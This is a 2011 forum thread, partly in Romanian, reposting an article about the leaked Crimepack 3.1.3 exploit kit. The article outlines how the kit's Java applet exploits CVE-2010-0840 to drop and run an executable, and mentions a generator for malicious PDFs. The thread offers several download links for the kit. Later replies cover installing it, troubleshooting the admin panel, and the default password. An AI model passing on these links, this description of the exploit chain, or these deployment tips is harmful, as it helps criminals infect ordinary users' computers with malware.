Nytro Posted May 12, 2011 Report Posted May 12, 2011 (edited) Crimepack 3.1.3 Exploit kitCrimepack 3.1.3 Exploit kit Leaked, available for Download !Part 1: Java ExploitAs stated above, I focus on a malware that exploits a recent JRE vulnerability: CVE-2010-0840 to execute malicious files on a victim system. This malware comes inside a jar file, which contains the following two classes: Crimepack.class and KAVS.class.Part 1.1: Crimepack.classThis class is the engine of the malware, it is obfuscated, but you can quickly strip off the obfuscation (my python beta tool is great…), once you get rid of the obfuscation you can see the following code:As always, we have an Applet that access to the data parameter, generates a random name for the exe payload that will be dropped in the system temp directory and then executed. So at this point as you can see we have nothing new, the above is a common Java downloader… but let’s scroll down:Above, we can see that the malware is creating a new instance of the KAVS class (description follows), in order to trigger the JRE vulnerability by using a call to the getValue() method (..snipped above..).Part 1.2: KAVS.classHere is the hand-crafted class, I say hand-crafted because such class cannot be compiled by using a standard compiler, so you have to edit the compiled class by editing the bytecode:Part 2: PDF-generator on demandThe kit contains a nice php script that drops custom pdf on-demand, which means that you can have several mutations of the same piece of malware, by simply connecting to a malicious link.Download:http://www.multiupload.com/3HGKHWMRS5Sursa: Crimepack 3.1.3 Exploit kit Leaked, available for Download ! ~ THN : The Hackers NewsAlternativ: http://www.speedyshare.com/files/28425214/Crimepack_3.1.3.ziphttp://www.megaupload.com/?d=THZ8OW23 Edited May 12, 2011 by Nytro Quote
sese Posted May 12, 2011 Report Posted May 12, 2011 L-ai testat recent ? Cam ce rata mai are ? banuiesc ca sub 10% Quote
Nytro Posted May 12, 2011 Author Report Posted May 12, 2011 Nu l-am testat, nu ma pasioneaza astfel de lucruri. Aveti grija, e posibil sa fie fisiere infectate. Quote
michee Posted May 13, 2011 Report Posted May 13, 2011 ce faci cu el atata timp cat e ionCube encoded? Quote
sese Posted May 13, 2011 Report Posted May 13, 2011 multumesc pentru share nytro si celorlalti care l-au testat . Quote
call911 Posted May 14, 2011 Report Posted May 14, 2011 e in readme am impresia pe acolo am gasito eu Quote
michee Posted May 14, 2011 Report Posted May 14, 2011 dap, ms........acuma cei care ati testat, v-au mers toate sploaitele?sigur nu e domeniul hardcodat pe undeva pe dinauntru?wtff???reusiti sa accesati control.php? presupun ca acolo sunt stats-urile....Am incercat cu ambii useri care i-am creat la instalare, imi da mereu "Unauthorized"......am verificat si-n baza de date, e ac. parola criptata md5. Quote
michee Posted May 15, 2011 Report Posted May 15, 2011 deci, a reusit careva sa se logheze in admin? Quote
call911 Posted May 17, 2011 Report Posted May 17, 2011 deci, a reusit careva sa se logheze in admin?parola la inceput e crimepack , dupa va logati in panel su user si pass Quote